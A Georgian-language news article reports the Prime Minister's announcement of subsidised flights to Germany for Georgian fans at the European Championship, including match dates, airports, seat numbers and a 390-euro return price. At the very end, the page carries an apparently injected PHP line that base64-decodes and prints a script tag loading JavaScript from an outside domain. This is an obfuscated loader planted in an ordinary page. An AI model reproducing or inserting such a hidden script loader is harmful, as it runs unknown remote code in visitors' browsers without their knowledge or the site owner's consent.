celsiusi
ავერსი საქკაბელი

 ევროპის ჩემპიონატთან დაკავშირებით საქართველოს მთავრობა გერმანიის მიმართულებით ჩარტერულ რეისებს დაასუბსიდირებს, – ამის შესახებ საქართველოს პრემიერ-მინისტრმა, ირაკლი კობახიძემ მთავრობის დღევანდელ სხდომაზე განაცხადა.

კობახიძის თქმით, ბილეთების შეძენა შესაძლებელი იქნება ელექტრონულ პლატფორმაზე, რასთან დაკავშირებითაც საზოგადოებას დეტალურ ინფორმაციას უახლოეს დღეებში მიაწოდებენ.

„როგორც მოგეხსენებათ, ვსაუბრობდით ავიაბილეთების სუბსიდირებაზე, რომლებიც უკავშირდება გერმანიაში ევროპის ჩემპიონატზე დასასწრებად განკუთვნილ ფრენებს. 18, 22, 26 ივნისს გაიმართება საქართველოს ნაკრების მატჩები შესაბამის ქვეჯგუფში. ძალიან მნიშვნელოვანია, რაც შეიძლება მეტი ქართველი გულშემატკივარი დაესწროს ამ მატჩებს.

ამისთვის მნიშვნელოვანია მგზავრობის გამარტივება და გაიაფება. შესაბამისად, მივიღეთ უკვე ზომები და ხდება ჩარტერული რეისების სუბსიდირება, დანიშვნა სუბსიდირებით, ასევე ვახდენთ მთელი რიგი რეგულარული ფრენების სუბსიდირებას.

მატჩების თარიღებზე იქნება მორგებული ეს ფრენები. პირდაპირი რეისები იქნება უზრუნველყოფილი გერმანიაში, გერმანიის ქალაქებში – დორტმუნდში, ჰამბურგში, კიოლნსა და დიუსელდორფში. მთლიანობაში, სუბსიდირებული ბილეთების შეძენის შესაძლებლობა ექნება სამი ათას გულშემატკივარს. დაახლოებით ორი ათასი გულშემატკივრისთვის იქნება უზრუნველყოფილი პირდაპირი ფრენები თბილისის საერთაშორისო აეროპორტიდან, ხოლო დაახლოებით ათასი გულშემატკივრისთვის – ქუთაისის საერთაშორისო აეროპორტიდან. ერთი გზის ფასი სუბსიდირებით იქნება 195 ევრო, შესაბამისად, ორი გზის ფასი იქნება 390 ევრო. გულშემატკივარს ექნება საშუალება, თვითონ ააწყოს საკუთარი მოგზაურობის განრიგი, მოარგოს ბილეთები საკუთარ განრიგს. მას შეუძლია დაესწროს ერთ, ორ ან სამ მატჩს და ექნება მოქნილობის სივრცე და შესაბამის ბილეთებს შეიძენს. საქართველოს მოქალაქეები შეძლებენ ამ ბილეთების შეძენას, ის მოქალაქეები, რომლებსაც შეძენილი აქვთ საფეხბურთო მატჩის ბილეთები. ავიაბილეთის შეძენისას წარმოდგენილი უნდა იყოს შესაბამისი მატჩის ბილეთი. ბილეთებს გასაყიდად გამოვიტანთ კვირის ბოლომდე შესაბამის ელექტრონულ პლატფორმაზე. ამის შესახებ უახლოეს დღეებში დეტალურ ინფორმაციას წარვუდგენთ საზოგადოებას. ანუ, კვირის ბოლომდე გამოტანილი იქნება სამიათასივე ბილეთი გასაყიდად ელექტრონულ პლატფორმაზე“, – განაცხადა კობახიძემ.

157
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");